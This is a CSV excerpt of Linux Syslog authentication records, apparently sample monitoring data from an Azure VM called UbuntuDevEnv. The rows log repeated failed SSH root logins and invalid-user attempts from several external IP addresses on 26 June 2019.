+13923,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:49:52,UbuntuDevEnv,2019-06-26 04:49:51,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,1682,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13924,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:49:54,UbuntuDevEnv,2019-06-26 04:49:53,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 43104 ssh2,1682,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,43104,,
+13925,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:01,UbuntuDevEnv,2019-06-26 04:50:00,auth,UbuntuDevEnv,info,Connection closed by 119.123.240.8 port 54678 [preauth],1710,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.123.240.8,54678,,
+13926,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:01,UbuntuDevEnv,2019-06-26 04:49:58,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 58.242.82.13 port 43104 ssh2],1682,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,43104,,
+13927,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:02,UbuntuDevEnv,2019-06-26 04:50:01,auth,UbuntuDevEnv,info,Invalid user git from 5.135.161.72 port 57618,1731,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,git,5.135.161.7,57618,,
+13928,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:02,UbuntuDevEnv,2019-06-26 04:50:01,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=5.135.161.72,1731,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,5.135.161.7,,0,
+13929,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:02,UbuntuDevEnv,2019-06-26 04:50:01,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,1731,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13930,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:02,UbuntuDevEnv,2019-06-26 04:50:01,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 43104 ssh2,1682,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,43104,,
+13931,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:04,UbuntuDevEnv,2019-06-26 04:50:03,auth,UbuntuDevEnv,info,Failed password for invalid user git from 5.135.161.72 port 57618 ssh2,1731,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,git,5.135.161.7,57618,,
+13932,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:04,UbuntuDevEnv,2019-06-26 04:50:03,auth,UbuntuDevEnv,info,Disconnected from invalid user git 5.135.161.72 port 57618 [preauth],1731,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,git,5.135.161.7,57618,,
+13933,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:04,UbuntuDevEnv,2019-06-26 04:50:03,auth,UbuntuDevEnv,info,Received disconnect from 5.135.161.72 port 57618:11: Bye Bye [preauth],1731,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,5.135.161.7,57618,,
+13934,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:04,UbuntuDevEnv,2019-06-26 04:50:04,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 43104 ssh2,1682,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,43104,,
+13935,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:08,UbuntuDevEnv,2019-06-26 04:50:08,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 43104 ssh2,1682,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,43104,,
+13936,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:08,UbuntuDevEnv,2019-06-26 04:50:08,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,1682,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+13937,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:08,UbuntuDevEnv,2019-06-26 04:50:08,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=95.216.195.95,1762,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,95.216.195.9,,0,
+13938,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:08,UbuntuDevEnv,2019-06-26 04:50:08,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 43104 ssh2 [preauth],1682,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,43104,,
+13939,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:08,UbuntuDevEnv,2019-06-26 04:50:08,auth,UbuntuDevEnv,info,Invalid user aos from 95.216.195.95 port 53050,1762,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,aos,95.216.195.9,53050,,
+13940,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:08,UbuntuDevEnv,2019-06-26 04:50:08,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 43104: Too many authentication failures [preauth],1682,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,43104,,
+13941,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:08,UbuntuDevEnv,2019-06-26 04:50:08,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,1682,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13942,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:08,UbuntuDevEnv,2019-06-26 04:50:08,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,1762,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13943,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:09,UbuntuDevEnv,2019-06-26 04:50:09,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,1766,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13944,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:10,UbuntuDevEnv,2019-06-26 04:50:09,auth,UbuntuDevEnv,info,Failed password for invalid user aos from 95.216.195.95 port 53050 ssh2,1762,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,aos,95.216.195.9,53050,,
+13945,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:10,UbuntuDevEnv,2019-06-26 04:50:09,auth,UbuntuDevEnv,info,Disconnected from invalid user aos 95.216.195.95 port 53050 [preauth],1762,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,aos,95.216.195.9,53050,,
+13946,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:10,UbuntuDevEnv,2019-06-26 04:50:09,auth,UbuntuDevEnv,info,Received disconnect from 95.216.195.95 port 53050:11: Bye Bye [preauth],1762,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,95.216.195.9,53050,,
+13947,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:12,UbuntuDevEnv,2019-06-26 04:50:11,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 48806 ssh2,1766,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,48806,,
+13948,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:25,UbuntuDevEnv,2019-06-26 04:50:23,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 58.242.82.13 port 48806 ssh2],1766,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,48806,,
+13949,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:25,UbuntuDevEnv,2019-06-26 04:50:25,auth,UbuntuDevEnv,info,Invalid user nexus from 140.143.223.242 port 37516,1818,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nexus,140.143.223.2,37516,,
+13950,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:25,UbuntuDevEnv,2019-06-26 04:50:25,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,1818,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13951,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:25,UbuntuDevEnv,2019-06-26 04:50:25,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=140.143.223.242,1818,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,140.143.223.2,,0,
+13952,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:26,UbuntuDevEnv,2019-06-26 04:50:25,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 48806 ssh2,1766,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,48806,,
+13953,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:26,UbuntuDevEnv,2019-06-26 04:50:25,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 48806 ssh2 [preauth],1766,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,48806,,
+13954,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:26,UbuntuDevEnv,2019-06-26 04:50:25,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 48806: Too many authentication failures [preauth],1766,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,48806,,
+13955,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:26,UbuntuDevEnv,2019-06-26 04:50:25,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,1766,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13956,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:26,UbuntuDevEnv,2019-06-26 04:50:25,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,1766,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+13957,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:27,UbuntuDevEnv,2019-06-26 04:50:26,auth,UbuntuDevEnv,info,Failed password for invalid user nexus from 140.143.223.242 port 37516 ssh2,1818,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nexus,140.143.223.2,37516,,
+13958,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:27,UbuntuDevEnv,2019-06-26 04:50:26,auth,UbuntuDevEnv,info,Received disconnect from 140.143.223.242 port 37516:11: Bye Bye [preauth],1818,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,140.143.223.2,37516,,
+13959,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:27,UbuntuDevEnv,2019-06-26 04:50:26,auth,UbuntuDevEnv,info,Disconnected from invalid user nexus 140.143.223.242 port 37516 [preauth],1818,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nexus,140.143.223.2,37516,,
+13960,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:27,UbuntuDevEnv,2019-06-26 04:50:26,auth,UbuntuDevEnv,info,Invalid user cisco from 196.41.208.238 port 59966,1825,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cisco,196.41.208.2,59966,,
+13961,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:27,UbuntuDevEnv,2019-06-26 04:50:26,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.41.208.238,1825,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.41.208.2,,0,
+13962,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:27,UbuntuDevEnv,2019-06-26 04:50:26,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,1825,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13963,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:28,UbuntuDevEnv,2019-06-26 04:50:28,auth,UbuntuDevEnv,info,Failed password for invalid user cisco from 196.41.208.238 port 59966 ssh2,1825,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cisco,196.41.208.2,59966,,
+13964,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:29,UbuntuDevEnv,2019-06-26 04:50:28,auth,UbuntuDevEnv,info,Disconnected from invalid user cisco 196.41.208.238 port 59966 [preauth],1825,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cisco,196.41.208.2,59966,,
+13965,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:29,UbuntuDevEnv,2019-06-26 04:50:28,auth,UbuntuDevEnv,info,Received disconnect from 196.41.208.238 port 59966:11: Bye Bye [preauth],1825,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.41.208.2,59966,,
+13966,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:29,UbuntuDevEnv,2019-06-26 04:50:28,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,1835,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13967,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:31,UbuntuDevEnv,2019-06-26 04:50:30,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 54918 ssh2,1835,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,54918,,
+13968,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:34,UbuntuDevEnv,2019-06-26 04:50:33,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 54918 ssh2,1835,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,54918,,
+13969,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:34,UbuntuDevEnv,2019-06-26 04:50:34,auth,UbuntuDevEnv,info,Invalid user remi_ext from 177.23.90.10 port 55634,1842,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,remi,177.23.90.1,55634,,
+13970,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:34,UbuntuDevEnv,2019-06-26 04:50:34,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,1842,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13971,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:34,UbuntuDevEnv,2019-06-26 04:50:34,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=177.23.90.10,1842,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,177.23.90.1,,0,
+13972,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:36,UbuntuDevEnv,2019-06-26 04:50:36,auth,UbuntuDevEnv,info,Failed password for invalid user remi_ext from 177.23.90.10 port 55634 ssh2,1842,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,remi,177.23.90.1,55634,,
+13973,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:36,UbuntuDevEnv,2019-06-26 04:50:36,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 54918 ssh2,1835,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,54918,,
+13974,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:37,UbuntuDevEnv,2019-06-26 04:50:36,auth,UbuntuDevEnv,info,Received disconnect from 177.23.90.10 port 55634:11: Bye Bye [preauth],1842,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,177.23.90.1,55634,,
+13975,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:37,UbuntuDevEnv,2019-06-26 04:50:36,auth,UbuntuDevEnv,info,Disconnected from invalid user remi_ext 177.23.90.10 port 55634 [preauth],1842,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,remi,177.23.90.1,55634,,
+13976,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:39,UbuntuDevEnv,2019-06-26 04:50:38,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 54918 ssh2,1835,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,54918,,
+13977,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:44,UbuntuDevEnv,2019-06-26 04:50:43,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 58.242.82.13 port 54918 ssh2],1835,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,54918,,
+13978,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:44,UbuntuDevEnv,2019-06-26 04:50:43,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 54918 ssh2 [preauth],1835,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,54918,,
+13979,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:44,UbuntuDevEnv,2019-06-26 04:50:43,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,1835,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+13980,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:44,UbuntuDevEnv,2019-06-26 04:50:43,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 54918: Too many authentication failures [preauth],1835,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,54918,,
+13981,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:44,UbuntuDevEnv,2019-06-26 04:50:43,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,1835,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13982,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:50:47,UbuntuDevEnv,2019-06-26 04:50:46,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,1898,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
